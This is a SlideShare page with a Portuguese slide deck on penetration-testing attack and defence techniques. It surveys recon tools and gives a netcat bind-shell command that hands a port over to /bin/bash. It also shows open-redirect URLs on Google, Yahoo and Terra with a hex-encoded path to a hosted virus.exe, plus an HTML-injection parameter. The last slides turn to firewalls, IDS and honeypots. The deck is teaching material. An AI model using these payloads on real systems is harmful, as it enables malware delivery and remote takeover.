Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)

118 visualizações

Publicada em

pesquisa

Publicada em: Tecnologia
1 comentário
0 gostaram
Estatísticas
Notas
  • Seja a primeira pessoa a gostar disto

Sem downloads
Visualizações
Visualizações totais
118
No SlideShare
0
A partir de incorporações
0
Número de incorporações
3
Ações
Compartilhamentos
0
Downloads
2
Comentários
1
Gostaram
0
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)

  1. 1. PENTEST Técnicas de invasão e defesa Por AnonFeh www.phillipewebdesigner.com www.virtuasolucoes.com
  2. 2. Tópicos • Técnicas de Invasão • Definindo um alvo • Recolhendo informações • Ferramentas úteis • Phishing • Esteganografia • Técnicas contra Invasão • Firewall + IDS • HIDS • HoneyPots • Antispam
  3. 3. Técnicas de invasão • Engenharia social • Brute Force • Espionagem • Segurança por obscuridade
  4. 4. Definindo um alvo • Onde buscar informações? • google • myspace • orkut • google groups
  5. 5. Google • Buscas específicas • Utilizando recursos avançados do google como • as tags Intitle, Inurl, Intext • Podem te trazer resultados muito interessantes.
  6. 6. Engenharia social • google • dig • nmap • nessus • Metasploit • telnet • sendip • john the ripper • host • hping3 • netcat Ferramentas úteis
  7. 7. Dig • Uma ferramenta similar ou nslookup porém mais flexível, pode ser utilizada para fazer buscas como A,TXT, MX e NS.
  8. 8. dig +qr google.com any • ;; ANSWER SECTION: • google.com. 10186 IN MX 10 smtp2.google.com. • google.com. 10186 IN MX 10 smtp3.google.com. • google.com. 10186 IN MX 10 smtp4.google.com. • google.com. 10186 IN MX 10 smtp1.google.com. • google.com. 318637 IN NS ns1.google.com. • google.com. 318637 IN NS ns2.google.com. • google.com. 318637 IN NS ns3.google.com. • google.com. 318637 IN NS ns4.google.com. • ;; AUTHORITY SECTION: • google.com. 318637 IN NS ns2.google.com. • google.com. 318637 IN NS ns3.google.com. • google.com. 318637 IN NS ns4.google.com. • google.com. 318637 IN NS ns1.google.com. ;; ADDITIONAL SECTION: • smtp1.google.com. 2986 IN A 72.14.203.25 • smtp2.google.com. 2986 IN A 64.233.167.25 • smtp3.google.com. 2986 IN A 64.233.183.25 • smtp4.google.com. 2986 IN A 72.14.215.25 • ns1.google.com. 345220 IN A 216.239.32.10 • ns2.google.com. 345220 IN A 216.239.34.10 • ns3.google.com. 345219 IN A 216.239.36.10 • ns4.google.com. 345219 IN A 216.239.38.10
  9. 9. PortScan
  10. 10. Nmap • é o mais famoso portscan existente hoje. (www.insecure.org/nmap). É uma ótima ferramenta, muito utilizado por hackers, para descobrir falhas no sistema, em portas abertas desnecessariamente.
  11. 11. Nessus • O Nessus é uma ferramenta de auditoria muito usada para detectar e corrigir vulnerabilidades nos PCs da rede local porem é muito utilizado por hackers para descobrir a vulnerabilidade de um alvo.
  12. 12. Reports
  13. 13. Metasploit • é um ambiente utilizado para escrever, testar, e executa códigos de exploit. Foi desenvolvido para prover penetração e testes em computadores relacionados a esse assunto, como também pesquisa de vulnerabilidade. • Metasploit • Linha de comando • Interface web
  14. 14. http://127.0.0.1:55555/
  15. 15. msfconsole
  16. 16. telnet www.alvo.com.br80 • Trying 200.189.171.181... • Connected to www.alvo.com.br. • Escape character is '^]'. • GET / HTTP/1.1 • Host: www.alvo.com.br
  17. 17. Resultado • Server: Microsoft-IIS/5.0 • X-Powered-By: ASP.NET • Content-Location: http://www.alvo.com.br/index.htm • Date: Thu, 01 Nov 2007 13:26:39 GMT • Content-Type: text/html • Accept-Ranges: bytes • Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
  18. 18. John The Ripper Um programa usado para decifrar senhas suportado nas plataformas UNIX, DOS, WinNT?/Win95. É um programa disponível gratuitamente desenvolvido para decifrar senhas MD5, DES baseado na função CRYPT.
  19. 19. hping3 • Mais uma ferramenta capaz de enviar pacotes TCP, UDP e ICMP personalizados e receber respostas como consegue em icmp. Com ele você pode enviar arquivos encapsulados e é util para ataques DoS.
  20. 20. netcat • Programa para consultoria de redes muito conhecido, isso deve-se ao fato de ele ser um programa muito versátil, podendo desde ser um simples telnet, portscan até um sniffer.
  21. 21. netcat • nc -l -e /bin/bash -p 1033 • A porta 1033 será colocada em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador.
  22. 22. Sniffer • # nc -vv -z 75.126.176.71 -p 80 22 110 25 21 • servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused • servidor9.molservidores.com [75.126.176.71] 110 (pop3) open • servidor9.molservidores.com [75.126.176.71] 25 (smtp) open • servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
  23. 23. Phishing • Phishing é um tipo de fraude projetada para roubar sua identidade. Em um phishing scam, uma pessoa mal- intencionada tenta obter informações como números de cartões de crédito, senhas, dados de contas ou outras informações pessoais convencendo você a fornecê-las sob pretextos enganosos. O que é phishing?
  24. 24. Exemplos de Phishing • Alguns sites famosos que permitem este tipo de fake: • google • yahoo • terra
  25. 25. Google • http://www.google.com/pagead/iclk?sa=l&ai= Br3ycNQz5Q- fXBJGSiQLU0eDSAueHkArnhtWZAu- FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f- P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NL QH0sz4&num=5&adurl=%63%6c%65%62%65 %65%72%2e%6e%6f%2d%69%70%2e%6f%72 %67%2f%76%69%72%75%73%2e%65%78%65
  26. 26. Yahoo • http://br.wrs.yahoo.com/_ylt=A0geum1Mv9R Gw4EB6FXz6Qt./SIG=129lovkbd/EXP=118843 4124/**%63%6c%65%62%65%65%72%2e%6e %6f%2d%69%70%2e%6f%72%67%2f%76%69 %72%75%73%2e%65%78%65
  27. 27. Buscador terra • http://buscador.terra.com.br/Redirector.aspx? bstat=terrastats01&type=CK&source=buscado r.terra.com.br&id=sponsored&partner=google &query=nike&position=1&target=%63%6c%65 %62%65%65%72%2e%6e%6f%2d%69%70%2e %6f%72%67%2f%76%69%72%75%73%2e%65 %78%65
  28. 28. Destino??? • Nas 3 URLs anteriores a requisição seria encaminhada para: clebeer.no-ip.org/virus.exe
  29. 29. Outro Exemplo http://www.cceinformatica.com.br/faleNew.php?mail=cvv@cce.com.br
  30. 30. Adicionando... &tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
  31. 31. Esteganografia • Esteganografia basicamente é uma técnica de esconder um arquivo dentro de outro arquivo, podendo ser uma imagem , ou documento do Word até mesmo uma planilha de excel e etc só que de uma forma criptografada.
  32. 32. jp(hide an seek) • O jphide e o jpseek são programas utilizados para esconder mensagens em arquivos JPEG.
  33. 33. origem.jpg
  34. 34. destino.jpg
  35. 35. msg.txt • Olá esta mensagem e secretae somente pessoas que possuam a senha podem vê- la senha: @@(##!(*#$#*(!(@&%$(@)codDEVdw)22 31
  36. 36. Utilização • Esconder mensagem: • jphide origem.jpg destino.jpg mensagem.txt • Descobir mensagem: • jpseek destino.jpg texto-secreto.txt
  37. 37. Quanto vale? Trojan (Shell) - US$ 350,00 - US$700,00 Trojan (Roubo de Senhas) - US$600,00 Listagem E-mail (32 milhões) - US$1.500,00 Milhões de Usuários do ICQ - US$150,00 Proteção Contra Detecção do Trojan - US$20,00 Suporte
  38. 38. Tecnicas contra invasão • Firewall • (NHWK)IDS • HoneyPots • Antispam
  39. 39. Firewall • Port Knock, uma solução leve e fácil de configurar, permite que portas específicas só sejam abertas no momento desejado atraves de tentativas de conexão em portas específicas.
  40. 40. *IDS • NIDS – Network Intrusion Detection System • HIDS - Host-based Intrusion Detection System • WIDS – Wireless Intrusion Detection System • KIDS - Kernel Intrusion Detection System
  41. 41. Honeypot • Útil para vigilância e alerta aos tipos de ataques mais utilizados porem deve ser utilizado com cuidado para que o invasor não tenha acesso a rede real.
  42. 42. Antispam • Indispensável para qualquer MX, útil para evitar emails forjados e de domínios não confiaveis, pode ser incrementado com opções de RBL e CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart").
  43. 43. Conclusão • Com a popularidade do SL a informação ficou mais acessível o que colaborou para um maior avanço das técnicas de invasão, em contra partida os sistemas de segurança vem se tornando mais estáveis a casa dia.
  44. 44. Creditos • Cartilha de Segurança - Códigos maliciosos (Malware) • http://cartilha.cert.br/malware/ • BRConnection - Internet Controlada • http://www.brc.com.br/ www.virtuasolucoes.com AnonFeh

×